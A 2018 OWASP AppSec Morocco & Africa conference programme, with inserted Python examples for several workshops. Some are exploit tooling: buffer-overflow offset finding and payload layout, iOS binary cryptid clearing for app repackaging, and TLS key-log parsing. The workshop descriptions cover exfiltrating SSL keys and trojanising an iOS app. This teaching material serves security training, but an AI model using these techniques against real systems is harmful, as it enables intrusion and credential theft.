Day 1 (15 Nov): Conferences & Workshops
Day 2 (Night 15-16 Nov): Capture The Flag
Day 3 (16 Nov): Conferences, Workshops & Bug Bounty

Attendees - Coffee, welcome and Registration

09:30 - 10:00 Tarik El Aouadi & Alaeddine Mesbahi
OWASP AppSec Introduction

Welcome to the OWASP Annual AppSec Morocco & Africa Cyber Security Conference, the premier application and cyber security conference for African developers and security experts. AppSec Morocco & Africa gives attendees access to leading speakers on application security and cyber security, hands-on workshops covering web and mobile applications, IoT, ICS/SCADA and networking, and exposure to current best practices in cybersecurity. The event offers eight conference talks and eight different hands-on workshops between Thursday 15th and Friday 16th of November 2018. This is an exceptional opportunity to attend one of the many hands-on courses offered by well known industry experts and future pioneers of the application and cyber security industry. There are talks for pen-testers and ethical hackers, developers and security engineers, DevOps practitioners, and GRC/risk-level talks for managers and CISOs. This year's program looks at application security both bottom-up and top-down, based on the SABSA framework and the TOGAF 9 enterprise architecture framework. We also offer a Capture The Flag. Welcome.

10:00 - 10:30 Azzeddine Ramrami
Keynote session: Toward a Safer and More Secure Cyberspace

Given the growing importance of cyberspace to nearly all aspects of national life, a secure cyberspace is vitally important to the nation, but cyberspace is far from secure today.

Morocco and Africa face the real risk that adversaries will exploit vulnerabilities in the nation's critical information systems, causing considerable suffering and damage. Online e-commerce businesses, government agency files, and identity records are all potential targets.

Toward a Safer and More Secure Cyberspace examines these Internet security vulnerabilities and offers a strategy for future research aimed at countering cyber attacks.

It also explores the nature of online threats and some of the reasons why past research on improving cybersecurity has had less impact than anticipated, and considers the human resource base needed to advance the cybersecurity research agenda.

This talk is an invaluable introduction for Internet security professionals, information technologists, policy makers, data stewards, e-commerce providers, consumer protection advocates, and others interested in digital security and safety.


Author's Bio: Azzeddine RAMRAMI
Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and a cyber security researcher at IBM Security X-Force.
Azzeddine RAMRAMI is also the chapter leader for OWASP Morocco and the president of OWASP Africa.

Coffee Break & Networking

You may want to visit our sponsors' exhibit booths for product demos, discussion and more while enjoying a good Moroccan tea.

11:00 - 11:30 Rali Kettani
Jumpstarting your DevSecOps Pipeline with IAST and RASP

Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
Prerequisites: Basic Security Software Knowledge
Domain: DevSecOps


DevSecOps is so much more than "automating the scan button." In this talk, we will create a continuous, effective, and scalable DevSecOps pipeline using only *free* tools. We'll use IAST (Interactive Application Security Testing) to accurately pinpoint vulnerabilities in real time without scanning.

Then we'll set up RASP (Runtime Application Self-Protection) to gain comprehensive visibility of attacks in operations and prevent exploits. And we'll integrate all of this vulnerability and attack telemetry into the tools your teams are already using.

  • We will enable developers with real-time security feedback right in their IDE
  • We will also ensure that libraries and frameworks are analyzed continuously for vulnerabilities
  • We'll integrate security into the CI/CD process so that we can easily fail a build
  • We'll identify application-layer attacks and create a whole new level of visibility for your SOC
  • We'll even prevent exploitation of newly discovered vulnerabilities in open source libraries

After this talk, you'll be able to establish your own DevSecOps pipeline immediately. This reference architecture can be adapted easily to almost any tools and processes, even legacy applications and waterfall-style projects.

    Author's Bio: Rali Kettani

    Rali Kettani is a Solutions Architect with Contrast Security, an IAST and RASP company that helps organizations incorporate security at DevOps speed. He has been in the technology field for over 15 years, much of it in application security. Rali has a background in software development and extensive experience with SAST, IAST and RASP technologies. He has helped dozens of Fortune 500 companies and US government entities modernize their application security practice and move to DevSecOps.

    Rali has a Master's degree in Management Information Systems from the George Washington University and a Bachelor's degree in Computer Science from Georgia College. Rali is based in Washington DC.

    11:30 - 12:00 Alaeddine Mesbahi
    Science of Software Security Assessments


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Domain: Offensive Security


    Offensive security has long been esoteric knowledge, discussed in closed circles among select groups and shared as black-magic recipes with secret ingredients. A lot has changed since the days of IRC chat rooms, 0-day exchanges and invite-only conferences. Security is now taught at schools, published in books and presented at conferences.

    Despite this progress, offensive security is for the most part still a manual process performed by pentesters, bug hunters or weekend enthusiasts. Most tools in use, both open source and commercial, are glorified brute forcers that test a large set of inputs hoping to find the one that works.

    New research and progress has however been made in the past few years, such as:

  • Introducing techniques from the world of machine learning into fuzzing, like reinforcement learning for input mutation and deep learning for dictionary inference
  • Enhancing taint tracking for both source code and binary analysis
  • Tree-based testing for black-box assessment of web applications

    This presentation focuses on the most astonishing progress made in this area and shares our experience implementing and running these techniques against web, mobile and system applications as part of the largest security scanning infrastructure in the world. We will present the challenges that software assessment presents, like path explosion, formalisation, or simply the sheer randomness of the world of web and standards.

    Author's Bio: Alaeddine Mesbahi works as a Security Engineer at Google specialized in penetration testing and security source code review.

    He is in his own words a Python addict, self-proclaimed green mint tea expert. He enjoys learning new stuff about InfoSec every day, losing at chess and practicing martial arts. Alaeddine holds the Offensive Security Certified Professional (OSCP) and Offensive Security Certified Expert (OSCE) certifications.

    12:00 - 12:30 Amine El Boukhari
    Penetration tests on web services


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Domain: API and Web Services


    First, an overview of how web services actually work; second, why they are critical and vulnerable; and finally, the main and critical vulnerabilities that we encounter today in penetration testing engagements.

    I will also present a brief demonstration of the tools and methodology of a web service penetration test.

    Author's Bio: Amine El Boukhari
    Amine El Boukhari is a senior cyber security consultant and penetration tester working at KPMG Paris. He leads various engagements and has been involved in many web services penetration testing engagements.

    Lunch & Networking

    Discussions continue over an authentic Moroccan tajine. Enjoy.

    14:00 - 17:30 Workshop 1 – Abdessamad Temmar
    Automated DevSecOps Infrastructure Deployment: Recipes to secure your devops tool chain

    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Strong Security Software Knowledge
    Domain: DevSecOps


    Security is becoming an increasingly important concern during the application development lifecycle, especially for teams practising fast (and furious) continuous delivery and frequent release cycles.

    In this workshop, participants will learn how to easily configure and map security tools onto their existing DevOps toolchain, and how to automate this process using cloud-infrastructure automation tools.

    The aim is to introduce security controls at the early stages of software development: while the developer is coding on their own machine, before code is pushed to the shared code repository (version control), and finally before (and after) code is deployed to the production environment.

    The workshop also provides a technical demo of how to make sure that the initially fixed security requirements are always respected by the production environment, through "continuous security monitoring".
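The "fail a build" step of the pipeline described in the IAST/RASP talk above and the "initial security requirements always respected" check of this workshop both come down to the same control: a gate that compares scanner output with a policy before the pipeline continues. The following is an added example written for this page, not code from either speaker, from Contrast Security or from any product. The finding fields (id, severity, title, location), the policy keys (fail_on, suppressions with an expiry date) and the findings themselves are constructed assumptions; map your own scanner's export onto them.

```python
# Added example, not code from the talk, the workshop or Contrast Security.
# A minimal CI/CD security gate: findings exported by a scanner (IAST, SCA,
# SAST, ...) are evaluated against a policy, and the build fails when a
# finding at or above the threshold is not covered by an unexpired
# suppression. Finding fields and policy keys are assumptions for this example.
import json
from datetime import date

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed scanner export (not real output of any product).
SAMPLE_FINDINGS = json.loads("""
[
  {"id": "sqli-001",  "severity": "high",     "title": "SQL injection",
   "location": "app/orders.py:42"},
  {"id": "xss-007",   "severity": "medium",   "title": "Reflected XSS",
   "location": "app/search.py:17"},
  {"id": "deser-003", "severity": "critical", "title": "Unsafe deserialization",
   "location": "app/session.py:88"},
  {"id": "ssrf-002",  "severity": "high",     "title": "SSRF",
   "location": "app/fetch.py:9"}
]
""")

# Constructed policy: fail on high and above, with two accepted-risk entries,
# one still valid and one whose review date has passed.
SAMPLE_POLICY = {
    "fail_on": "high",
    "suppressions": [
        {"id": "deser-003", "expires": "2099-01-01", "reason": "not reachable, covered by RASP rule"},
        {"id": "ssrf-002", "expires": "2018-01-01", "reason": "fix planned"},
    ],
}


def evaluate_findings(findings, policy, today=None):
    """Return (passed, blocking); blocking lists the findings that stop the build.

    A suppression only counts while its expiry date has not passed: an expired
    one re-enables the finding instead of hiding it forever.
    """
    if today is None:
        today = date.today()
    elif isinstance(today, str):
        today = date.fromisoformat(today)
    threshold = SEVERITY_RANK[policy["fail_on"].lower()]
    suppressions = {s["id"]: date.fromisoformat(s["expires"])
                    for s in policy.get("suppressions", [])}
    blocking = []
    for f in findings:
        rank = SEVERITY_RANK.get(f["severity"].lower(), 0)
        if rank < threshold:
            continue
        expiry = suppressions.get(f["id"])
        if expiry is not None and expiry >= today:
            continue  # accepted risk, still inside its review window
        blocking.append(f"{f['id']} [{f['severity']}] {f['title']} at {f['location']}")
    return (not blocking, blocking)


def gate_exit_code(findings, policy, today=None):
    """0 lets the pipeline continue, 1 fails the build (the value the CI job returns)."""
    passed, blocking = evaluate_findings(findings, policy, today)
    for line in blocking:
        print("BLOCKING:", line)
    return 0 if passed else 1


if __name__ == "__main__":
    raise SystemExit(gate_exit_code(SAMPLE_FINDINGS, SAMPLE_POLICY))
```

Run as the last step of the CI job, the non-zero exit code is what fails the build; the same function run on a schedule against findings from the production RASP/IAST agent is the "continuous security monitoring" check, with the expiry dates forcing accepted risks to be reviewed rather than forgotten.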

    Author's Bio: Abdessamad TEMMAR
    Abdessamad TEMMAR is an information security consultant at Abcit, a Moroccan firm fully dedicated to information security. He has worked across a variety of engagements to provide security professional services to clients.

    Abdessamad is also a member of the OWASP Proactive Controls project, where he contributes to the update of its Top Ten document, and a co-author of the Mobile Security Testing Guide:
    https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide#tab=Acknowledgemen
    and
    https://www.owasp.org/index.php/OWASP_Proactive_Controls

    14:00 - 17:30 Workshop 2 – Boumediene KADDOUR
    Decrypting SSL traffic using a malicious smartphone and USB sticks


    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers
    Prerequisites: Strong Security Software Knowledge, Basic Assembly Language, Hardware knowledge
    Domain: Ethical Hacking


    Most computer users avoid the risks coming from removable media by performing an antivirus scan or formatting the entire disk, believing that this wipes every virus from the mass-storage area of the USB device.

    Security researchers have revealed that the microcontroller firmware of some USB devices is hidden from the user and not reachable by antivirus products or other security controls; this hidden area has been leveraged by criminals and hackers to store malware that executes automatically when the USB device is plugged into a computer.

    One of the most used recent techniques is the USB HID keyboard attack, in which a USB flash drive impersonates a Human Interface Device (HID) such as a keyboard in order to execute commands automatically and hijack the computer. The same technique is now applied from smartphones, which extends the risk for end users.

    In this workshop, we provide as many of these scenarios as possible, fully hands-on, demonstrating how computers and phones can easily be exploited by reprogrammed firmware, and how a smartphone can easily be turned into a rogue device or BadUSB to steal sensitive information such as Facebook chats and email credentials even with SSL turned on.

    Our added value in this talk is to demonstrate how we can easily instruct the browsers (Chrome and Firefox) to write their SSL master keys to a file of our choice, which is sent to our Gmail account by a script the smartphone has deployed, and then use those master keys to decrypt the captured encrypted data.
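The key-file trick above relies on a documented feature rather than a browser bug: when the SSLKEYLOGFILE environment variable names a writable path, Firefox (through NSS) and Chrome append their TLS secrets to it in the NSS key log format, the same file Wireshark consumes to decrypt a capture. The following added example, which is not code from the workshop, parses that format and validates entries the way a decryption tool must, and includes the defensive counterpart: spotting the variable in a process environment. The log lines are constructed, not captured from a real session.

```python
# Added example, not code from the workshop. Parses the NSS key log format
# that SSLKEYLOGFILE makes Firefox and Chrome write, and checks an
# environment mapping for the variable. Sample lines are constructed.
import os
import re

# Each line is "<LABEL> <client_random hex> <secret hex>"; '#' starts a comment.
# CLIENT_RANDOM carries the TLS 1.2 master secret (48 bytes); the other labels
# are the TLS 1.3 secrets (32 or 48 bytes depending on the cipher suite hash).
TLS13_LABELS = {
    "CLIENT_EARLY_TRAFFIC_SECRET", "EARLY_EXPORTER_MASTER_SECRET",
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0", "EXPORTER_SECRET",
}
HEX = re.compile(r"^[0-9a-fA-F]+$")

# Constructed key log: two valid entries, one truncated secret, one junk line.
SAMPLE_KEYLOG = "\n".join([
    "# SSL/TLS secrets log file, generated by NSS",
    "CLIENT_RANDOM " + "aa" * 32 + " " + "bb" * 48,
    "CLIENT_TRAFFIC_SECRET_0 " + "cc" * 32 + " " + "dd" * 32,
    "CLIENT_RANDOM " + "ee" * 32 + " " + "ff" * 10,
    "garbage line",
])


def parse_keylog(text):
    """Return ({(label, client_random_bytes): secret_bytes}, malformed_line_count)."""
    secrets, malformed = {}, 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 3:
            malformed += 1
            continue
        label, client_random, secret = parts
        if not (HEX.match(client_random) and HEX.match(secret)) or len(client_random) != 64:
            malformed += 1          # client random is always 32 bytes
            continue
        if label == "CLIENT_RANDOM" and len(secret) != 96:
            malformed += 1          # TLS 1.2 master secret is always 48 bytes
            continue
        if label in TLS13_LABELS and len(secret) not in (64, 96):
            malformed += 1          # SHA-256 or SHA-384 sized secret
            continue
        if label != "CLIENT_RANDOM" and label not in TLS13_LABELS:
            malformed += 1          # unknown label
            continue
        secrets[(label, bytes.fromhex(client_random))] = bytes.fromhex(secret)
    return secrets, malformed


def lookup_master_secret(secrets, client_random):
    """Given the ClientHello random seen in a capture, return the TLS 1.2 master secret or None."""
    return secrets.get(("CLIENT_RANDOM", client_random))


def keylog_exposure(env):
    """Defensive check: the key log path if this environment turns logging on, else None.

    Run against os.environ on a workstation, or against the environment of a
    running browser process, this flags the persistence the attack relies on.
    """
    path = env.get("SSLKEYLOGFILE")
    return path if path else None


if __name__ == "__main__":
    found, bad = parse_keylog(SAMPLE_KEYLOG)
    print(f"{len(found)} usable secrets, {bad} malformed lines")
    print("SSLKEYLOGFILE set in this shell:", keylog_exposure(os.environ))
```

The lookup is keyed on the ClientHello random because that value is sent in clear and is what ties a captured session to its line in the file; the length checks matter because a truncated or partially overwritten line silently yields a secret that decrypts nothing.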

    Author's BIO: Boumediene KADDOUR is a cyber defense consultant and holds the OSCP and OSWP certifications. He previously worked as an Infosec Thief trainer, as an Incident Handler, and as a Cyber Defense Consultant in Dubai with a company called Malcrove.
    He has participated in many international seminars, delivering cyber security talks as a professional speaker.

    14:00 - 17:30 Workshop 3 – Benjamin NABET
    Modifying an official and trusted iOS application to make it malicious

    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers
    Prerequisites:
    Mandatory: macOS, Xcode
    Good to know: Objective-C and ARM basics
    Nice to have: a jailbroken iPhone

    Starting from an official iOS application published on the App Store, we'll learn how to reverse it in order to embed malicious code and redistribute it. After showing how to dump and decrypt the code (ARM reversing, Mach-O architecture, ...), we'll go through the basics of debugging on the target (dynamic inspection) to analyze the app and spot the sensitive functions and data. We'll then show how to modify the code, resign the app and share the malicious version.
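On the "dump and decrypt" step: an App Store binary carries an LC_ENCRYPTION_INFO (or LC_ENCRYPTION_INFO_64) load command whose cryptid field is 1 while the __TEXT pages are FairPlay-encrypted, and dumping tools write the decrypted pages back into a copy and set cryptid to 0 so that static tools can read it. The following is an added example, not the workshop's own material, that parses a thin 64-bit Mach-O header to report that state and whether an LC_CODE_SIGNATURE command is present (the part that resigning replaces). The sample header is constructed, not taken from a real application.

```python
# Added example, not code from the workshop. Reads the load commands of a
# thin little-endian 64-bit Mach-O and reports the FairPlay encryption state
# and the presence of a code signature. SAMPLE is a constructed header.
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_ENCRYPTION_INFO = 0x21      # 32-bit variant, 20 bytes
LC_ENCRYPTION_INFO_64 = 0x2C   # 64-bit variant, 24 bytes (trailing pad field)
LC_CODE_SIGNATURE = 0x1D       # linkedit_data_command: cmd, cmdsize, dataoff, datasize
MACH_HEADER_64_SIZE = 32
CRYPTID_OFFSET = 16            # cmd, cmdsize, cryptoff, cryptsize, then cryptid
CPU_TYPE_ARM64 = 0x0100000C


def load_commands(blob):
    """Yield (cmd, cmdsize, offset) for each load command, bounds-checked against sizeofcmds."""
    magic, _cpu, _sub, _ftype, ncmds, sizeofcmds, _flags, _res = struct.unpack_from("<8I", blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O (fat or 32-bit files need extra handling)")
    off = MACH_HEADER_64_SIZE
    end = MACH_HEADER_64_SIZE + sizeofcmds
    for _ in range(ncmds):
        if off + 8 > end:
            raise ValueError("load commands overrun sizeofcmds")
        cmd, cmdsize = struct.unpack_from("<2I", blob, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("bad cmdsize")
        yield cmd, cmdsize, off
        off += cmdsize


def encryption_state(blob):
    """Report whether the binary is still FairPlay-encrypted and whether it carries a signature."""
    state = {"encrypted": False, "cryptoff": None, "cryptsize": None, "code_signature": False}
    for cmd, _size, off in load_commands(blob):
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            _cmd, _cs, cryptoff, cryptsize, cryptid = struct.unpack_from("<5I", blob, off)
            state.update(encrypted=cryptid != 0, cryptoff=cryptoff, cryptsize=cryptsize)
        elif cmd == LC_CODE_SIGNATURE:
            state["code_signature"] = True
    return state


def clear_cryptid(blob):
    """Return a copy with cryptid set to 0, the fix-up a dumper applies after writing decrypted pages."""
    out = bytearray(blob)
    for cmd, _size, off in load_commands(blob):
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            struct.pack_into("<I", out, off + CRYPTID_OFFSET, 0)
    return bytes(out)


def _build_sample():
    """Constructed header: an encrypted range of 0x8000 bytes at 0x4000, plus a code signature."""
    enc = struct.pack("<6I", LC_ENCRYPTION_INFO_64, 24, 0x4000, 0x8000, 1, 0)
    sig = struct.pack("<4I", LC_CODE_SIGNATURE, 16, 0xC000, 0x1000)
    header = struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_ARM64, 0, 2, 2, len(enc) + len(sig), 0, 0)
    return header + enc + sig


SAMPLE = _build_sample()

if __name__ == "__main__":
    print("as shipped:", encryption_state(SAMPLE))
    print("after dump:", encryption_state(clear_cryptid(SAMPLE)))
```

Run on a real binary (after slicing the right architecture out of a fat file), "encrypted: True" tells you the bytes on disk are useless to a disassembler and must be dumped from a running process on a jailbroken device; after the dump, clearing cryptid is what lets the modified, resigned copy load.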

    Author's Bio:
    Benjamin NABET
    CEO at Bsecure (www.bsecure.fr)
    Benjamin has worked in cybersecurity since 2002. He has owned Bsecure, a French company, since 2010 and provides security consultancy to both large companies and SMBs. Fond of mobile security, he has worked on mobile application security since 2009 and has helped well-known companies secure their apps.

    • Capture the Flag Challenges
    08:00pm - 08:00am Capture The Flag Details
    CTF starts at 8pm on November 15, 2018


    The challenge will start on Thursday 15 November 2018 at 20:00 and end on the next day at 08:00 Moroccan time.

    All participants must be physically present at the location of the CTF (Hotel Val d'Infa Casablanca).

    Support will be given in person and using a communication channel shared before the beginning of the challenge.

    In order to be eligible for the prizes and be a part of the competition, you must abide by the following rules:

  • Teams are composed of 3 to 5 players
  • Do not attack the infrastructure. If you find a problem with one of the tasks, please report it to the organisation team
  • You are not allowed to attack other teams. Any attempt to cheat in the contest will lead to immediate disqualification
  • Only team members present at the CTF location can be part of the contest. Requesting help from people outside the event location will lead to immediate disqualification
  • The winner will be the team that collects the most points
  • Requesting hints in private is forbidden. Hints will be shared with all teams
  • If two teams have equal scores, the team that reached that score first will have the advantage
  • In order to be eligible for money prizes, the top 3 teams are expected to deliver write-ups. Write-ups will be made public and shared on the OWASP conference website
  • We reserve the right to disqualify teams if the write-ups are not sufficiently complete
  • The organisation team of the conference is not allowed to participate in the challenges
  • Be respectful of other participants and report any misconduct or discrimination


    Registration will open on 30 October 2018. Please stay tuned.

    Be your best!

    • Conferences, Workshops & Bug Bounty
    08:30 - 09:30 Attendees - Coffee and Registration

    09:00 - 16:00 Bug Bounty Yogosha
    Bug Bounty All day with Yogosha (Part 1)

    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: High skills in security and bug hunting
    Domain: Bug Bounty

    The four steps of your Bug Bounty

    • Define your target
    • Define your budget
    • Estimate the price of your bugs
    • Validate and reward bug reports submitted by our researchers

    We will discuss the following during two workshop sessions:
    • What are the advantages of a bug bounty?
    • How does the platform work?
    • How are Yogosha security researchers selected?
    • How can I be sure that no researcher will damage my IT?
    • What if two researchers report the same vulnerability?
    • What does CVSS mean?
    • How to estimate the price of a vulnerability?
    • What's the price of a bug bounty?
    • Is the platform secure?

    Author's BIO: Yassir Kazar
    Yassir Kazar is CEO of Yogosha.

    09:00 - 12:30 Workshop 1 – Mohamed Oussama Lessis
    Windows Buffer Overflow vulnerability - from vulnerability discovery to exploit writing

    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Domain: Exploit Development

    Description: In this workshop we will look at how to exploit buffer overflows on Windows systems. We will start from the very basics: reverse engineering a vulnerable application, discovering the buffer overflow issue, and writing the exploit for that vulnerable application. Participants will examine various recognized exploit-writing techniques. They will be led through a series of advanced topics and exercises based on real-world and staged application examples to illustrate the concepts.

    Lab prerequisites: a PC with a Windows VM.
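The first mechanical steps of the exploit-writing process described above (finding how many bytes land before the saved return address, sweeping for bad characters, and laying out the final buffer), written out as an added example that is not the workshop's material and targets no specific application. The cyclic pattern is the classic upper/lower/digit triple construction; the crash value 0x41326241 and the return address 0x11223344 are placeholders, not addresses from any real binary, and the "shellcode" is an INT3 breakpoint so a debugger stops on success.

```python
# Added example, not code from the workshop. Offset discovery, bad-character
# sweep and buffer layout for a classic 32-bit Windows stack overflow.
# All addresses below are placeholders chosen for illustration.
import itertools
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3   # the Aa0..Zz9 triples stay unique up to this length


def pattern_create(length):
    """Cyclic pattern (Aa0Aa1Aa2...) in which every 4-byte window is unique."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    triples = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    out = "".join(u + l + d for u, l, d in itertools.islice(triples, length // 3 + 1))
    return out[:length]


def pattern_offset(eip_value, length):
    """Offset of the 4 bytes that ended up in EIP inside the pattern, or -1 if not found.

    EIP is read as a 32-bit integer in the debugger; the bytes were stored
    little-endian on the stack, so pack them back before searching.
    """
    needle = struct.pack("<I", eip_value).decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


def badchar_string(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad (0x00 by default)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent, dumped):
    """Compare the sweep sent with the stack dump; return the first mangled byte, or None.

    Only the first mismatch is meaningful: a bad byte usually truncates or
    shifts everything after it, so add it to exclude and send the sweep again.
    """
    for s, d in zip(sent, dumped):
        if s != d:
            return s
    return None if len(dumped) >= len(sent) else sent[len(dumped)]


def build_buffer(offset, ret_addr, shellcode, nops=16, total=None):
    """filler | overwritten return address (e.g. a JMP ESP) | NOP sled | shellcode [| padding]."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode
    if total is not None and len(buf) < total:
        buf += b"C" * (total - len(buf))   # keep the crash length the target expects
    return buf


if __name__ == "__main__":
    crash_eip = 0x41326241                   # placeholder: value read from EIP at the crash
    off = pattern_offset(crash_eip, 2000)
    print("EIP overwritten at offset", off)
    sweep = badchar_string()
    # Constructed dump in which 0x0a was turned into 0x00 by the target
    print("first bad char:", hex(first_bad_char(sweep, sweep.replace(b"\x0a", b"\x00"))))
    exploit = build_buffer(off, 0x11223344, b"\xcc" * 4, total=2000)   # 0x11223344 is a placeholder
    print(len(exploit), "bytes, return address bytes:", exploit[off:off + 4].hex())
```

Two details that catch people in the lab: the offset search must reverse the byte order of the EIP value (0x41326241 corresponds to "Ab2A" in memory, not "A2bA"), and the final buffer should be padded back to the same length that caused the crash, since a shorter send can land the return address somewhere else entirely.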

     

    Author's BIO: Mohamed Oussama Lessis

    Oussema Lessis is a cyber security manager at EY. He has been a security enthusiast and researcher since an early age. He has covered multiple topics, including but not limited to:

    - Penetration testing
    - Red Team engagements
    - Malware Analysis
    - Social Engineering
    - Exploit Writing
    - Forensic investigation

    09:00 - 12:30 Workshop 2 – Souri Abdelhalim
    Orchestrating containers with Kubernetes

    Target Audience: Architects, sysadmins, Developers, Cybersecurity Specialist, DevOps engineers, Programmers, and everyone eager to learn new stuff.
    Prerequisites:
    Basic Security Software Knowledge
    A working knowledge of Linux (e.g., shells, SSH, and package managers)
    A basic understanding of web servers, particularly how they typically communicate, IPs, and ports
    Domain: DevSecOps

    Description: If you have heard about Docker, containers and Kubernetes but don't have much (or any!) experience yet, this fast-paced session will get you started.

    In this workshop you'll learn:
    • How to create, modify and interact with container images
    • Docker client and server running in single or distributed mode
    • Build and publish your own custom images
    • Scanning your container images
    • Build your own penetration testing lab
    • Gain a basic understanding of Kubernetes fundamentals
    • Learn how to use Kubernetes in production
    • Deploy and manage Docker containers using kubectl
    • Set up ReplicaSets, Services and Deployments on Kubernetes
    • Deploy applications on Kubernetes
    Materials or downloads needed in advance: https://github.com/etadata/owasp-workshop/blob/master/README.md

    Bio: Abdelhalim Souri
    Abdelhalim Souri is a senior security engineer at N+ONE, a leading carrier-neutral datacenter company in Morocco.
    His interests include SecDevOps and studying how to apply machine learning to detect potential security flaws.
    He also enjoys participating in competitive programming contests.

    09:00 - 12:30 Workshop 3 – Azzeddine Ramrami
    IoT ICS/SCADA Security & Hacking

    Target Audience: Architects, SOC Analyst, Cybersecurity Specialist, Programmers
    Prerequisites: Strong Security Software Knowledge, Basic Assembly Language
    Level: Hardware Security

    Securing control systems is a challenge. Off-the-shelf software and hardware as well as remote access possibilities in industrial environments increase continuously. The broader threat landscape and increased sophistication of attacks indicate the need to bolster the security posture of Operational Technology (OT), and in particular industrial control systems (ICS) and SCADA environments. But where to begin?

    Workshop Contents:

    • ICS fundamentals and ICS framework - ICS basics - Developing governance and an ICS framework - Risk management in ICS
    • Controls and solutions - Incident management - Network segmentation - Security monitoring - Remote access security - Patching and malware prevention - Portable media security
    • Practical approach - Case studies from practice - Active and passive security assessments - Building a security operating model - Security roadmap in ICS organisations

    Author's Bio: Azzeddine RAMRAMI
    Azzeddine RAMRAMI is a Senior Security Architect at IBM Security and a cyber security researcher at IBM Security X-Force.
    Azzeddine RAMRAMI is also the chapter leader for OWASP Morocco and the President of OWASP Africa.

    12:30 - 14:30 Lunch & Networking

    14:30 - 15:00 Franck Thicot
    Considerations on implementing regulation requirements to protect critical applications


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: Basic Security Software Knowledge
    Level: Practicing


    • Presentation of the key requirements
    • Challenges in implementing them
    • Approach scenarios selected in the context of a financial services organization: results and lessons learned

    15:00 - 15:30 Amina Dik
    Computer security and fraud: legal aspects


    Target Audience: Architects, Developers, Cybersecurity Specialist, Programmers
    Prerequisites: No requirement
    Level: Regulation


    Points to present/discuss:
    I - Measures penalising fraud against information systems
    1. Fraudulent access to, and remaining within, an information system
    2. Deliberate interference with the operation of a computer system
    II - Measures penalising data-related fraud
    1. Attacks on data integrity
    2. Offences relating to the processing of personal data
    III - The organisational arsenal against computer fraud
    1. Institutional means of fighting computer fraud
    2. Judicial cooperation tools
    IV - The legal framework for IT security
    1. Recommendations and guidelines of security partners
    2. Regulation on the protection of personal data
    V - Legal security obligations
    1. Breach of the security obligation
    2. The obligation to notify security breaches
    3. The scope and limits of the obligation to decrypt

    Author's BIO: Amina DIK
    Chief engineer in charge of studies at the Ministry of Justice, Amina Dik is a doctoral candidate in engineering sciences at the Faculty of Sciences in Rabat.
    She also followed the legal curriculum from the start, leading to a doctorate in private law.
    She intends to use this dual background to encourage lawyers and engineers to work together in answering the demands for legal security that come with the demand for technical security.

    15:30 - 16:00 Hassan CHARRAF
    The quest for happiness in a digital world


    Target Audience: All
    Prerequisites: Nothing but happiness
    Level: Keep Cool


    We live in a world full of change and transformation that no one can escape any more.
    The technological challenge brings solutions, but also more constraints.
    Will we be happier, or will we miss what is essential?


    Author's BIO: Hassan Charraf
    State Engineer (Ingénieur d'Etat), 1989
    MBA from the Université de Sherbrooke - Québec
    Doctoral researcher at the Académie de management de Paris, on happiness
    Vice President of CIDEC (Centre international pour le développement et la coopération)
    Past President of CJD Maroc
    Vice President of AMDUS
    Former board member of INMA - SA
    Former General Manager of Omnium International du Commerce et de l'Industrie
    Former Director of Strategic Studies and Planning (oil group)
    Former Director of Organisation and Information Systems (industrial group)
    Former member of the Employment and Social Relations commission (CGEM)
    Human development expert on European projects - MEDA 2 FP
    Labour market expert on European projects - MEDA 2 FP
    Entrepreneurship & diaspora investment expert on European projects (ACEDIM - PACEIM - DIAMED - MAGHRIB ENTREPRENEURS)
    Former board member of INTENT
    International speaker

    16:00 - 16:30 Coffee Break & Networking

    16:30 - 17:00 Yassir Kazar
    Cyber Security: Back to the Future

    Bio: Passionate about cybersecurity, Yassir Kazar is a serial entrepreneur who founded his first startup while finishing his studies. He then pursued a career in IT services and became a staff manager in Business Intelligence at CGI, while teaching business intelligence to master's students at Paris V. He took part in launching the local branch of the Open Knowledge Foundation as well as that of OuiShare, a think tank dedicated to the collaborative economy. In 2015 he founded Yogosha, "defender" in Japanese, a trusted platform for private bug bounties that aims to expand across Europe, Africa and the Middle East.

    17:00 - 17:30 STAFF
    Conclusion, CTF winners and Bug Bounty winners

    CTF description and registration will be managed via a Google form. We will publish more information this week.